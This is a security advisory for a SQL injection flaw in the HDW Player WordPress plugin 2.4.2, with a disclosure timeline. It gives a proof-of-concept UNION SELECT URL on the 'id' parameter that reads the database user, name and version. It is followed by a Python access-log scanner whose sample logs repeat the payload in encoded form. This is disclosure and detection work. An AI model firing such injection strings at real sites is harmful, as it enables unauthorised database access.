Plugin Details
Plugin Name: wp-plugin : hdw-player-video-player-video-gallery
Affected Version : 2.4.2 (and most probably lower versions, if any)
Vulnerability : Injection
Minimum Level of Access Required : Administrator
CVE Number :
Identified by : Anantshri
Disclosure Timeline
- December 25, 2013 : Vendor Contacted
- April 22, 2014 : Plugin Updated
- May 28, 2014 : Public Disclosure
Technical Details
<http://localhost/wp-admin/admin.php?page=videos&opt=edit&id=2 union select 1,2,user(),4,5,6,database(),8,@@version,10,11,12>
Vulnerable Parameter : id
Trac ChangeLog : https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=900030%40hdw-player-video-player-video-gallery&old=798976%40hdw-player-video-player-video-gallery&sfp_email=&sfph_mail=
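
A log check for the parameter described above, as an added example that is not part of the original advisory or the plugin's code: it flags requests to `admin.php?page=videos` whose `id` is anything other than a plain integer. The log lines are constructed, and the names `check_request` and `scan` are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>.+?) HTTP/[\d.]+"')

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [28/May/2014:10:00:01 +0000] "GET /wp-admin/admin.php?page=videos&opt=edit&id=2 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [28/May/2014:10:00:05 +0000] "GET /wp-admin/admin.php?page=videos&opt=edit&id=2%20union%20select%201,2,user() HTTP/1.1" 200 5340',
    '203.0.113.9 - - [28/May/2014:10:00:09 +0000] "GET /wp-admin/admin.php?page=videos&opt=edit&id=2+union+select+1 HTTP/1.1" 200 5340',
    '203.0.113.7 - - [28/May/2014:10:00:12 +0000] "GET /wp-admin/admin.php?page=settings&id=abc HTTP/1.1" 200 900',
]


def check_request(target):
    """Return the decoded id if a videos-page request carries a non-integer id."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin.php"):
        return None
    # parse_qs decodes %20 and + so encoded payloads are compared in clear text.
    params = parse_qs(parts.query, keep_blank_values=True)
    if "videos" not in params.get("page", []):
        return None
    for value in params.get("id", []):
        # A legitimate edit link carries a row number and nothing else.
        if not re.fullmatch(r"[0-9]+", value):
            return value
    return None


def scan(lines):
    """Return (client address, decoded id) for every suspicious request."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match is None:
            continue
        bad_id = check_request(match.group("target"))
        if bad_id is not None:
            hits.append((line.split()[0], bad_id))
    return hits


if __name__ == "__main__":
    for client, bad_id in scan(SAMPLE_LOG):
        print(f"{client}: non-integer id {bad_id!r}")
```

Because the issue requires Administrator access, a hit in the logs also points at the account or session that issued the request.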